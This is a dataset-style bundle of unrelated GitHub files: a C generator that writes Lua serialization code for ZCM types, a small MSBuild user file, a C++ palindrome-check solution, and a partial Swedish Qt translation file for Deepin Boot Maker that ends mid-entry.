emit (1+n, "for i%d = 1, obj.%s do", n, last_dim->size);
}
g_string_append_printf (accessor, "[i%d]", n);
_emit_decode_one (zcm, f, ls, lm, accessor->str, n+2);
emit (1+n, "end");
}
g_string_free (accessor, TRUE);
while ( --n >= 0 ) {
emit (1+n, "end");
}
}
}
_flush_read_struct_fmt (zcm, f, struct_fmt, struct_members);
g_queue_free (struct_fmt);
g_queue_free (struct_members);
emit(0, "");
emit(0, " return obj");
emit(0, "end");
emit(0, "");
}
static void
emit_lua_decode (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls)
{
const char *sn = ls->structname->shortname;
emit(0, "function %s.decode(data)", sn);
emit(0, "");
emit(0, " if data:sub(1, 8) ~= %s._packed_fingerprint then", sn);
emit(0, " error('bad fingerprint')");
emit(0, " end");
emit(0, "");
emit(0, " return %s._decode_one(data:sub(9))", sn);
emit(0, "end");
emit(0, "");
}
static void
_emit_encode_one (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls,
zcm_member_t *lm, const char *accessor, int indent)
{
// XXX luaified, but might need some work
const char *tn = lm->type->lctypename;
const char *mn = lm->membername;
if (!strcmp ("string", tn)) {
emit (indent, "local __%s_tmpstr = zcm._pack.prepare_string(%s)", mn, accessor);
emit (indent, "table.insert(buf_table, zcm._pack.pack('>I', #__%s_tmpstr + 1))", mn);
emit (indent, "table.insert(buf_table, __%s_tmpstr .. '\\0')", mn);
} else if (!strcmp ("byte", tn)) {
emit (indent, "table.insert(buf_table, zcm._pack.pack('>B', %s))", accessor);
} else if (!strcmp ("int8_t", tn)) {
emit (indent, "table.insert(buf_table, zcm._pack.pack('>b', %s))", accessor);
} else if (!strcmp ("boolean", tn)) {
emit (indent, "table.insert(buf_table, zcm._pack.pack('>?', %s))", accessor);
} else if (!strcmp ("int16_t", tn)) {
emit (indent, "table.insert(buf_table, zcm._pack.pack('>h', %s))", accessor);
} else if (!strcmp ("int32_t", tn)) {
emit (indent, "table.insert(buf_table, zcm._pack.pack('>l', %s))", accessor);
} else if (!strcmp ("int64_t", tn)) {
emit (indent, "table.insert(buf_table, zcm._pack.pack('>q', %s))", accessor);
} else if (!strcmp ("float", tn)) {
emit (indent, "table.insert(buf_table, zcm._pack.pack('>f', %s))", accessor);
} else if (!strcmp ("double", tn)) {
emit (indent, "table.insert(buf_table, zcm._pack.pack('>d', %s))", accessor);
} else {
emit (indent, "table.insert(buf_table, %s:_encode_one())", accessor);
}
}
static void
_emit_encode_list(const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls,
zcm_member_t *lm, const char *accessor, int indent,
const char *len, int fixed_len)
{
const char *tn = lm->type->lctypename;
if (!strcmp ("byte", tn) ||
!strcmp ("boolean", tn) ||
!strcmp ("int8_t", tn) ||
!strcmp ("int16_t", tn) ||
!strcmp ("int32_t", tn) ||
!strcmp ("int64_t", tn) ||
!strcmp ("float", tn) ||
!strcmp ("double", tn)) {
if(fixed_len) {
emit(indent, "table.insert(buf_table, zcm._pack.pack('>%s%c', unpack(%s)))",
len, _struct_format(lm), accessor);
} else {
emit(indent, "table.insert(buf_table, zcm._pack.pack(string.format('>%%d%c', self.%s), unpack(%s)))",
_struct_format(lm), len, accessor);
}
} else {
assert(0);
}
}
static void
_flush_write_struct_fmt (FILE *f, GQueue *formats, GQueue *members)
{
// XXX encode primitive members in one line
assert (g_queue_get_length (formats) == g_queue_get_length (members));
if (g_queue_is_empty (formats)) return;
emit_start (1, "table.insert(buf_table, zcm._pack.pack('>");
while (! g_queue_is_empty (formats)) {
emit_continue ("%c", GPOINTER_TO_INT (g_queue_pop_head (formats)));
}
emit_continue ("', ");
while (! g_queue_is_empty (members)) {
zcm_member_t *lm = (zcm_member_t*) g_queue_pop_head (members);
emit_continue ("self.%s", lm->membername);
if (! g_queue_is_empty (members)) {
emit_continue (", ");
}
}
emit_end ("))");
}
static void
emit_lua_encode_one (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls)
{
emit(0, "function %s:_encode_one()", ls->structname->shortname);
// check for no members
if(!g_ptr_array_size(ls->members)){
emit(0, "");
emit(0, " -- nothing to do");
emit(0, "end");
return;
}
emit(0, "");
emit(0, " local buf_table = {}");
emit(0, "");
GQueue *struct_fmt = g_queue_new ();
GQueue *struct_members = g_queue_new ();
for (unsigned int m = 0; m < g_ptr_array_size(ls->members); m++) {
zcm_member_t *lm = (zcm_member_t *) g_ptr_array_index(ls->members, m);
char fmt = _struct_format (lm);
if (! lm->dimensions->len) {
// XXX not an array
if (fmt) {
// XXX is a primitive
g_queue_push_tail (struct_fmt, GINT_TO_POINTER ((int)fmt));
g_queue_push_tail (struct_members, lm);
} else {
// XXX not a primitive
_flush_write_struct_fmt (f, struct_fmt, struct_members);
char *accessor = g_strdup_printf("self.%s", lm->membername);
_emit_encode_one (zcm, f, ls, lm, accessor, 1);
g_free(accessor);
}
} else {
// XXX this is an array
_flush_write_struct_fmt (f, struct_fmt, struct_members);
GString *accessor = g_string_new ("");
g_string_append_printf (accessor, "self.%s", lm->membername);
int n;
for (n=0; n<lm->dimensions->len - 1; n++) {
zcm_dimension_t *dim =
(zcm_dimension_t*) g_ptr_array_index (lm->dimensions, n);
g_string_append_printf (accessor, "[i%d]", n);
if (dim->mode == ZCM_CONST) {
emit (1+n, "for i%d = 1, %s do", n, dim->size);
} else {
emit (1+n, "for i%d = 1, self.%s do", n, dim->size);
}
}
// last dimension.
zcm_dimension_t *last_dim = (zcm_dimension_t *) g_ptr_array_index(lm->dimensions,
lm->dimensions->len - 1);
int last_dim_fixed_len = last_dim->mode == ZCM_CONST;
if(zcm_is_primitive_type(lm->type->lctypename) &&
0 != strcmp(lm->type->lctypename, "string")) {
_emit_encode_list(zcm, f, ls, lm,
accessor->str, 1+n, last_dim->size, last_dim_fixed_len);
} else {
if (last_dim_fixed_len) {
emit (1+n, "for i%d = 1, %s do", n, last_dim->size);
} else {
emit (1+n, "for i%d = 1, self.%s do", n, last_dim->size);
}
g_string_append_printf (accessor, "[i%d]", n);
_emit_encode_one (zcm, f, ls, lm, accessor->str, n+2);
emit (1+n, "end");
}
g_string_free (accessor, TRUE);
while ( --n >= 0 ) {
emit (1+n, "end");
}
}
}
_flush_write_struct_fmt (f, struct_fmt, struct_members);
g_queue_free (struct_fmt);
g_queue_free (struct_members);
emit(0, "");
emit(0, " return table.concat(buf_table)");
emit(0, "end");
emit(0, "");
}
static void
emit_lua_encode (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls)
{
const char *sn = ls->structname->shortname;
emit(0, "function %s:encode()", sn);
emit(0, "");
emit(0, " return %s._packed_fingerprint .. self:_encode_one()", sn);
emit(0, "end");
emit(0, "");
}
static void
emit_member_initializer(const zcmgen_t* zcm, FILE *f, zcm_member_t* lm,
int dim_num)
{
if(dim_num == lm->dimensions->len) {
emit_end("%s", nil_initializer_string(lm->type));
return;
}
zcm_dimension_t *dim =
(zcm_dimension_t *) g_ptr_array_index (lm->dimensions, dim_num);
if(dim->mode == ZCM_VAR) {
emit_end("{}");
} else {
emit_end("{}");
emit(dim_num + 1, "for d%d = 1, %s do", dim_num, dim->size);
emit_start(dim_num + 2, "obj.%s", lm->membername);
for(int i = 0; i < dim_num + 1; i++){
emit_continue("[d%d]", i);
}
emit_continue(" = ");
emit_member_initializer(zcm, f, lm, dim_num + 1);
emit(dim_num + 1, "end");
}
}
static void
emit_lua_new (const zcmgen_t *zcm, FILE *f, zcm_struct_t *lr)
{
emit(0, "function %s:new()", lr->structname->shortname);
emit(0, "");
emit(0, " local obj = {}");
emit(0, "");
unsigned int member;
for (member = 0; member < lr->members->len; member++) {
zcm_member_t *lm = (zcm_member_t *) g_ptr_array_index(lr->members, member);
fprintf(f, " obj.%s = ", lm->membername);
// XXX this might need alot of work because lua doesn't have list comprehension
emit_member_initializer(zcm, f, lm, 0);
}
if (0 != member) emit(0, "");
emit(0, " setmetatable(obj, self)");
emit(0, "");
emit(0, " return obj");
emit(0, "end");
emit(0, "");
}
static void
emit_lua_fingerprint (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls)
{
const char *sn = ls->structname->shortname;
emit(0, "function %s._get_hash_recursive(parents)", sn);
emit(0, "");
emit(0, " local newparents = {}");
emit(0, "");
emit(0, " for _, v in ipairs(parents) do");
emit(0, " if v == %s then return zcm._hash.new('0x0') end", sn);
emit(0, " table.insert(newparents, v)");
emit(0, " end");
emit(0, "");
emit(0, " table.insert(newparents, %s)", sn);
emit(0, "");
emit(0, " local hash = zcm._hash.new('0x%"PRIx64"')", ls->hash);
// add all substruct hashes
for (unsigned int m = 0; m < ls->members->len; m++) {
zcm_member_t *lm = (zcm_member_t *) g_ptr_array_index(ls->members, m);
const char *msn = lm->type->shortname;
if (! zcm_is_primitive_type(lm->type->lctypename)) {
const char *ghr = "_get_hash_recursive(newparents)";
// XXX this might need a touch up, not sure about intra-module names
if (is_same_type(lm->type, ls->structname)) {
emit(0, " + %s.%s", msn, ghr);
} else {
char *variablename = escape_typename_to_variablename(lm->type->lctypename);
emit(0, " + %s.%s", variablename, ghr);
g_free(variablename);
}
}
}
emit(0, " hash:rotate(1)");
emit(0, "");
emit(0, " return hash");
emit(0, "end");
emit(0, "");
emit(0, "%s._packed_fingerprint = zcm._pack.pack('>X', %s._get_hash_recursive({}))", sn, sn);
emit(0, "");
}
static void
emit_lua_dependencies (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls)
{
GHashTable *dependencies = g_hash_table_new (g_str_hash, g_str_equal);
for (unsigned int m=0; m<ls->members->len; m++) {
zcm_member_t *lm = (zcm_member_t *) g_ptr_array_index (ls->members, m);
if (! zcm_is_primitive_type (lm->type->lctypename)) {
if (!g_hash_table_lookup (dependencies, lm->type->lctypename)
&& strcmp(lm->type->lctypename, ls->structname->lctypename)) {
g_hash_table_insert (dependencies, lm->type->lctypename,
lm->type->lctypename);
}
}
}
GPtrArray *deps = _hash_table_get_vals (dependencies);
for (int i=0; i<deps->len; i++) {
const char *package = (char *) g_ptr_array_index (deps, i);
char *variablename = escape_typename_to_variablename(package);
emit (0, "local %s = require('%s')", variablename, package);
g_free(variablename);
}
if(deps->len) emit (0, "");
g_ptr_array_free (deps, TRUE);
g_hash_table_destroy (dependencies);
}
static void
emit_lua_locals (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls)
{
emit(0, "local setmetatable = setmetatable");
emit(0, "local ipairs = ipairs");
emit(0, "local table = table");
emit(0, "local string = string");
emit(0, "local unpack = unpack");
emit(0, "");
}
static void
emit_lua_buffer_helper (const zcmgen_t *zcm, FILE *f, zcm_struct_t *ls)
{
emit(0, "-- buffer helper for decoding");
emit(0, "local _buffer_helper = {}");
emit(0, "_buffer_helper.__index = _buffer_helper");
emit(0, "");
emit(0, "function _buffer_helper:new(data_str)");
emit(0, "");
emit(0, " local obj = {buffer = data_str, index = 1}");
emit(0, " setmetatable(obj, self)");
emit(0, "");
emit(0, " return obj");
emit(0, "end");
emit(0, "");
emit(0, "function _buffer_helper:read(n_bytes)");
emit(0, "");
emit(0, " local partial = self.buffer:sub(self.index, self.index + n_bytes - 1)");
emit(0, " self.index = self.index + n_bytes");
emit(0, "");
emit(0, " if self.index > #self.buffer + 1 then");
emit(0, " error('buffer ran out of bytes')");
emit(0, " end");
emit(0, "");
emit(0, " return partial");
emit(0, "end");
emit(0, "");
}
typedef struct {
char *name;
GPtrArray *enums;
GPtrArray *structs;
} _package_contents_t;
static _package_contents_t * _package_contents_new (const char *name)
{
_package_contents_t *pc = (_package_contents_t *) malloc (sizeof(_package_contents_t));
pc->enums = g_ptr_array_new ();
pc->structs = g_ptr_array_new ();
pc->name = strdup (name);
return pc;
}
static void _package_contents_free (_package_contents_t *pc)
{
g_ptr_array_free (pc->enums, TRUE);
g_ptr_array_free (pc->structs, TRUE);
free (pc->name);
free (pc);
}
// XXX step 2, basically the main function
static int
emit_package (zcmgen_t *zcm, _package_contents_t *pc)
{
// create the package directory, if necessary
char **dirs = g_strsplit (pc->name, ".", 0);
char *pdname = build_filenamev (dirs);
char package_dir[PATH_MAX];
char package_dir_prefix[PATH_MAX];
int have_package = dirs[0] != NULL;
sprintf (package_dir_prefix, "%s%s", getopt_get_string(zcm->gopt, "lpath"),
strlen(getopt_get_string(zcm->gopt, "lpath")) > 0 ?
G_DIR_SEPARATOR_S : "");
sprintf(package_dir, "%s%s%s", package_dir_prefix, pdname,
have_package ? G_DIR_SEPARATOR_S : "");
free (pdname);
if (strlen (package_dir)) {
if (! g_file_test (package_dir, G_FILE_TEST_EXISTS)) {
// g_mkdir_with_parents (package_dir, 0755);
mkdir_with_parents (package_dir, 0755);
}
if (!g_file_test (package_dir, G_FILE_TEST_IS_DIR)) {
err ("Could not create directory %s\n", package_dir);
return -1;
}
}
// write the package init.lua files, if necessary
FILE *init_lua_fp = NULL;
GHashTable * initlua_requires = NULL;
GHashTable * initlua_requires_subpack = NULL;
if (have_package) {
int ndirs = 0;
for (ndirs=0; dirs[ndirs]; ndirs++);
for (int i=0 ; i<ndirs; i++) {
// make filename
char *initlua_fname;
{
char *initlua_fname_parts[1024];
assert(ndirs + 4 < 1024);
initlua_fname_parts[0] = package_dir_prefix;
for (int j=0; j<=i; j++) {
initlua_fname_parts[j+1] = dirs[j];
}
initlua_fname_parts[i+2] = "init.lua";
initlua_fname_parts[i+3] = NULL;
initlua_fname = build_filenamev (initlua_fname_parts);
}
// make current package name
char * package_name;
{
char * name_parts[1024];
assert(i < 1024);
for (int j = 0; j <= i; j++) {
name_parts[j] = dirs[j];
}
name_parts[i + 1] = NULL;
package_name = g_strjoinv(".", name_parts);
}
if (initlua_requires) {
g_hash_table_destroy(initlua_requires);
initlua_requires = NULL;
}
if (initlua_requires_subpack) {
g_hash_table_destroy(initlua_requires_subpack);
initlua_requires_subpack = NULL;
}
initlua_requires = g_hash_table_new_full(g_str_hash, g_str_equal, g_free, g_free);
initlua_requires_subpack = g_hash_table_new_full(g_str_hash, g_str_equal, g_free, g_free);
// if the file already exists, read the contents
if (g_file_test (initlua_fname, G_FILE_TEST_EXISTS)) {
init_lua_fp = fopen(initlua_fname, "r");
if (!init_lua_fp) {
perror ("fopen");
free (initlua_fname);
g_free(package_name);
return -1;
}
while(!feof(init_lua_fp)) {
char buf[4096];
memset(buf, 0, sizeof(buf));
char *result = fgets(buf, sizeof(buf)-1, init_lua_fp);
if(!result)
break;
// XXX get all of the previous types and packages
// this regex works because the first part is greedy
GRegex * regex = g_regex_new("require\\('([\\w+\\.]*\\.)(\\w+)'\\)( -- subpackage)?",
(GRegexCompileFlags) 0, (GRegexMatchFlags) 0, NULL);
GMatchInfo * matchinfo;
if(g_regex_match(regex, buf, (GRegexMatchFlags) 0, &matchinfo)){
if(g_match_info_get_match_count(matchinfo) == 3){
// not a subpackage
gchar * classname = g_match_info_fetch(matchinfo, 2);
g_hash_table_insert(initlua_requires, g_strdup(classname), g_strdup(classname));
}else if(g_match_info_get_match_count(matchinfo) == 4){
// this is a subpackage
// XXX fprintf(stderr, "> buff: %s\n", buf);
gchar * superpackage = g_match_info_fetch(matchinfo, 1);
gchar * subpackage = g_match_info_fetch(matchinfo, 2);
// XXX fprintf(stderr, "> super: %s, sub: %s\n", superpackage, subpackage);
gchar * fullsubpackage = g_strjoin("", superpackage, subpackage, NULL);
// XXX fprintf(stderr, "> [2] inserting: %s\n", fullsubpackage);
g_hash_table_insert(initlua_requires_subpack, g_strdup(fullsubpackage), g_strdup(fullsubpackage));
g_free(fullsubpackage);
}
}
g_match_info_free(matchinfo);
g_regex_unref(regex);
}
fclose(init_lua_fp);
init_lua_fp = NULL;
}
init_lua_fp = fopen(initlua_fname, "w");
// XXX fprintf(stderr, "> opened: %s\n", initlua_fname);
if (!init_lua_fp) {
perror ("fopen");
free (initlua_fname);
g_free(package_name);
return -1;
}
#ifndef WIN32
// lock init.lua for exclusive write access
// TODO do the equivalent in windows
struct flock lockinfo;
lockinfo.l_type = F_WRLCK;
lockinfo.l_start = 0;
lockinfo.l_whence = SEEK_SET;
lockinfo.l_len = 0 ;
lockinfo.l_pid = getpid();
if(0 != fcntl(fileno(init_lua_fp), F_SETLKW, &lockinfo)) {
perror("locking init.lua");
free(initlua_fname);
g_free(package_name);
fclose(init_lua_fp);
return -1;
}
#endif
fprintf (init_lua_fp, "--[[\n"
"ZCM package init.lua file\n"
"This file automatically generated by zcm-gen.\n"
"DO NOT MODIFY BY HAND!!!!\n"
"--]]\n"
"\n"
"local M = {}\n"
"\n");
// add in all previous types
GList * package_types = g_hash_table_get_values(initlua_requires);
for (int j = 0; j < g_list_length(package_types); j++) {
char * tn = (char *) g_list_nth_data(package_types, j);
char * fn = g_strjoin(".", package_name, tn, NULL);
fprintf(init_lua_fp, "M.%s = require('%s')\n", tn, fn);
g_free(fn);
}
g_list_free(package_types);
// add in all previous packages
GList * subpacks = g_hash_table_get_values(initlua_requires_subpack);
for (int j = 0; j < g_list_length(subpacks); j++) {
char * spn = (char *) g_list_nth_data(subpacks, j);
// get the base of the package name
char ** tmpsplit = g_strsplit(spn, ".", -1);
char * sn = tmpsplit[g_strv_length(tmpsplit) - 1];
// XXX fprintf(stderr, "[1] sn: %s, spn: %s\n", sn, spn);
fprintf(init_lua_fp, "M.%s = require('%s') -- subpackage\n", sn, spn);
g_strfreev(tmpsplit);
}
g_list_free(subpacks);
// if the current package has a subpackage (which eventually contains the target package)
// add a `require` for that subpackage to the current (if it hasn't already)
if (i + 1 < ndirs) {
char *subpack_name = g_strjoin(".", package_name, dirs[i + 1], NULL);
// check for the subpackage name
if (!g_hash_table_lookup(initlua_requires_subpack, subpack_name)) {
// add it if it didn't exist
g_hash_table_insert(initlua_requires_subpack, g_strdup(subpack_name), g_strdup(subpack_name));
// XXX fprintf(stderr, "[2] sn: %s, spn: %s\n", dirs[i + 1], subpack_name);
fprintf(init_lua_fp, "M.%s = require('%s') -- subpackage\n", dirs[i + 1], subpack_name);
}
g_free(subpack_name);
}
// not yet the target?
if (i + 1 < ndirs) {
// close it out
fprintf(init_lua_fp, "\nreturn M\n\n");
fclose(init_lua_fp);
init_lua_fp = NULL;
}
free (initlua_fname);
g_free(package_name);
}
}
g_strfreev (dirs);
////////////////////////////////////////////////////////////
// STRUCTS
for (int i = 0; i<pc->structs->len; i++) {
zcm_struct_t *ls = (zcm_struct_t *) g_ptr_array_index(pc->structs, i);
char path[PATH_MAX];
sprintf (path, "%s%s.lua", package_dir, ls->structname->shortname);
if(init_lua_fp){
// XXX add the 'require' to the appropriate init.lua
if (!g_hash_table_lookup(initlua_requires, ls->structname->shortname)) {
fprintf(init_lua_fp, "M.%s = require('%s')\n", ls->structname->shortname, ls->structname->lctypename);
}
// XXX look for subpackages
for (unsigned int m = 0; m < g_ptr_array_size(ls->members); m++) {
zcm_member_t *lm = (zcm_member_t *) g_ptr_array_index(ls->members, m);
if(g_str_has_prefix(lm->type->package, pc->name)){
// make a regex starting with the current package...
gchar ** tmpsplit = g_strsplit(pc->name, ".", 0);
gchar * regexpackage = g_strjoinv("\\.", tmpsplit);
// only look for immediate submodules, not submodules of the submodules
gchar * regexstr = g_strjoin("", "^", regexpackage, "\\.(\\w+)", NULL);
GRegex * regex = g_regex_new(regexstr, (GRegexCompileFlags) 0, (GRegexMatchFlags) 0, NULL);
GMatchInfo * matchinfo;
g_strfreev(tmpsplit);
g_free(regexpackage);
g_free(regexstr);
if (g_regex_match(regex, lm->type->package, (GRegexMatchFlags) 0, &matchinfo)) {
if (g_match_info_get_match_count(matchinfo) == 2) {
gchar * fullsubpackage = g_match_info_fetch(matchinfo, 0);
gchar * subpackage = g_match_info_fetch(matchinfo, 1);
// was it already in the file?
if (!g_hash_table_lookup(initlua_requires_subpack, fullsubpackage)) {
// XXX fprintf(stderr, "> [1] inserting: %s\n", fullsubpackage);
g_hash_table_insert(initlua_requires_subpack, g_strdup(fullsubpackage), g_strdup(fullsubpackage));
fprintf(init_lua_fp, "M.%s = require('%s') -- subpackage\n", subpackage, fullsubpackage);
}
}
}
g_match_info_free(matchinfo);
g_regex_unref(regex);
}
}
}
if (!zcm_needs_generation(zcm, ls->zcmfile, path))
continue;
FILE *f = fopen(path, "w");
if (f==NULL) return -1;
fprintf(f, "--[[\n"
"ZCM type definitions\n"
"This file automatically generated by zcm.\n"
"DO NOT MODIFY BY HAND!!!!\n"
"--]]\n"
"\n"
"local zcm = require('zcm')\n\n");
emit_lua_dependencies (zcm, f, ls);
// XXX added this...
emit_lua_locals(zcm, f, ls);
emit_lua_buffer_helper(zcm, f, ls);
// XXX step 3, start making the object
emit(0, "local %s = {}", ls->structname->shortname);
emit(0, "%s.__index = %s", ls->structname->shortname, ls->structname->shortname);
emit(0, "");
// CONSTANTS
for (unsigned int cn = 0; cn < g_ptr_array_size(ls->constants); cn++) {
zcm_constant_t *lc = (zcm_constant_t *) g_ptr_array_index(ls->constants, cn);
assert(zcm_is_legal_const_type(lc->lctypename));
emit(1, "%s.%s = %s", ls->structname->shortname,
lc->membername, lc->val_str);
}
if (g_ptr_array_size(ls->constants) > 0)
emit(0, "");
// NAMES
emit(0, "%s.name = '%s'", ls->structname->shortname, ls->structname->lctypename);
emit(0, "%s.packagename = '%s'", ls->structname->shortname, ls->structname->package);
emit(0, "%s.shortname = '%s'", ls->structname->shortname, ls->structname->shortname);
emit(0, "");
emit_lua_new (zcm, f, ls);
emit_lua_fingerprint (zcm, f, ls);
emit_lua_encode (zcm, f, ls);
emit_lua_encode_one (zcm, f, ls);
emit_lua_decode (zcm, f, ls);
emit_lua_decode_one (zcm, f, ls);
emit(0, "return %s", ls->structname->shortname);
emit(0, "");
fclose (f);
}
if(init_lua_fp){
fprintf(init_lua_fp, "\nreturn M\n\n");
fclose(init_lua_fp);
}
g_hash_table_destroy(initlua_requires);
return 0;
}
// XXX step 1, but there's not much to see, then go to emit package
int emit_lua(zcmgen_t *zcm)
{
GHashTable *packages = g_hash_table_new_full (g_str_hash,
g_str_equal, NULL, (GDestroyNotify)_package_contents_free);
// group the enums and structs by package
for (unsigned int i = 0; i < zcm->enums->len; i++) {
zcm_enum_t *le = (zcm_enum_t *) g_ptr_array_index(zcm->enums, i);
_package_contents_t *pc = (_package_contents_t *) g_hash_table_lookup (packages,
le->enumname->package);
if (!pc) {
pc = _package_contents_new (le->enumname->package);
g_hash_table_insert (packages, pc->name, pc);
}
g_ptr_array_add (pc->enums, le);
}
for (unsigned int i = 0; i < zcm->structs->len; i++) {
zcm_struct_t *ls = (zcm_struct_t *) g_ptr_array_index(zcm->structs, i);
_package_contents_t *pc = (_package_contents_t *) g_hash_table_lookup (packages,
ls->structname->package);
if (!pc) {
pc = _package_contents_new (ls->structname->package);
g_hash_table_insert (packages, pc->name, pc);
}
g_ptr_array_add (pc->structs, ls);
}
GPtrArray *vals = _hash_table_get_vals (packages);
for (int i=0; i<vals->len; i++) {
_package_contents_t *pc = (_package_contents_t *) g_ptr_array_index (vals, i);
int status = emit_package (zcm, pc);
if (0 != status) return status;
}
g_ptr_array_free (vals, TRUE);
g_hash_table_destroy (packages);
return 0;
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<ProjectView>ShowAllFiles</ProjectView>
</PropertyGroup>
</Project> | {
"pile_set_name": "Github"
} |
// Valid Palindrome
class Solution {
public:
bool isPalindrome(string s) {
int i = 0, j = 0;
for (; i < s.size(); i++)
if (isalnum(s[i]))
s[j++] = s[i];
for (i = 0; i < --j; i++)
if (tolower(s[i]) != tolower(s[j]))
return false;
return true;
}
};
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE TS>
<TS version="2.1" language="sv">
<context>
<name>BMHandler</name>
<message>
<location filename="../libdbm/backend/bootmaker.cpp" line="67"/>
<source>Disk Format Error: Please format the disk with FAT32</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../libdbm/backend/bootmaker.cpp" line="65"/>
<source>Failed to call the command 1%</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../libdbm/backend/bootmaker.cpp" line="69"/>
<source>Insufficient Disk Space: Ensure the disk has 1% free space</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../libdbm/backend/bootmaker.cpp" line="71"/>
<source>Disk Mount Error: Insert the disk again or reboot to retry</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../libdbm/backend/bootmaker.cpp" line="73"/>
<source>Image Decompression Error: Verify md5 checksum of the image to ensure its integrity</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../libdbm/backend/bootmaker.cpp" line="75"/>
<source>Internal Error</source>
<translation type="unfinished"></translation>
</message>
</context>
<context>
<name>BMWindow</name>
<message>
<source>Deepin Boot Maker</source>
<translation type="vanished">Deepin Boot Skapare</translation>
</message>
<message>
<location filename="../app/bmwindow.cpp" line="121"/>
<source>Boot Maker is a simple tool to write system image files into CD/DVD, USB flash drive and other media.</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/bmwindow.cpp" line="123"/>
<source>Boot Maker</source>
<translation type="unfinished"></translation>
</message>
</context>
<context>
<name>ISOSelectView</name>
<message>
<location filename="../app/view/isoselectview.cpp" line="144"/>
<source>OR</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/isoselectview.cpp" line="88"/>
<location filename="../app/view/isoselectview.cpp" line="163"/>
<source>Select an ISO image file</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/isoselectview.cpp" line="124"/>
<source>Drag an ISO image file here</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/isoselectview.cpp" line="214"/>
<source>Next</source>
<translation>Nästa</translation>
</message>
<message>
<location filename="../app/view/isoselectview.cpp" line="238"/>
<source>Illegal ISO image file</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/isoselectview.cpp" line="301"/>
<source>Reselect an ISO image file</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/isoselectview.cpp" line="442"/>
<source>Detecting ISO file, please wait...</source>
<translation type="unfinished"></translation>
</message>
</context>
<context>
<name>ProgressView</name>
<message>
<location filename="../app/view/progressview.cpp" line="61"/>
<source>Burning</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/progressview.cpp" line="77"/>
<source>Burning, please wait...</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/progressview.cpp" line="89"/>
<source>Do not remove the disk or shut down the computer during the process</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/progressview.cpp" line="111"/>
<source>Cancel</source>
<translation>Avbryt</translation>
</message>
</context>
<context>
<name>QObject</name>
<message>
<location filename="../libdbm/util/deviceinfo.h" line="40"/>
<source>Removable Disk</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../libdbm/util/utils.cpp" line="115"/>
<source>Removable disk</source>
<translation>Löstagbar hårddisk</translation>
</message>
<message>
<source>Deepin Boot Maker</source>
<translation type="vanished">Deepin Boot Skapare</translation>
</message>
<message>
<location filename="../app/main.cpp" line="123"/>
<source>Boot Maker</source>
<translation type="unfinished"></translation>
</message>
</context>
<context>
<name>ResultView</name>
<message>
<location filename="../app/view/resultview.cpp" line="148"/>
<source>Reboot now</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/resultview.cpp" line="131"/>
<source>Done</source>
<translation>Klar</translation>
</message>
<message>
<location filename="../app/view/resultview.cpp" line="65"/>
<source>Successful</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/resultview.cpp" line="228"/>
<source>The error log will be uploaded automatically with the feedback. We cannot improve without your feedback</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/resultview.cpp" line="229"/>
<source>Submit Feedback</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/resultview.cpp" line="239"/>
<source>After-Sale Services</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/resultview.cpp" line="255"/>
<source>Close</source>
<translation>Stäng</translation>
</message>
<message>
<location filename="../app/view/resultview.cpp" line="263"/>
<source>Sorry, process failed</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/resultview.cpp" line="264"/>
<source>Process failed</source>
<translation type="unfinished"></translation>
</message>
</context>
<context>
<name>UnmountUsbView</name>
<message>
<location filename="../app/view/unmountusbview.cpp" line="13"/>
<source>Verifying data and safely removing the media, please wait...</source>
<translation type="unfinished"></translation>
</message>
</context>
<context>
<name>UsbSelectView</name>
<message>
<location filename="../app/view/usbselectview.cpp" line="332"/>
<source>Format USB flash drive</source>
<translation>Formatera USB-minne</translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="87"/>
<source>Select a disk</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="114"/>
<source>Format the disk to increase the burning success rate</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="163"/>
<source>No disk available</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="183"/>
<source>Start</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="251"/>
<source>Formatting will erase all data on the disk, please confirm and continue</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="334"/>
<source>Formatting the disk will overwrite all data, please have a backup before proceeding.</source>
<translation type="unfinished"></translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="335"/>
<source>Cancel</source>
<translation>Avbryt</translation>
</message>
<message>
<location filename="../app/view/usbselectview.cpp" line="336"/>
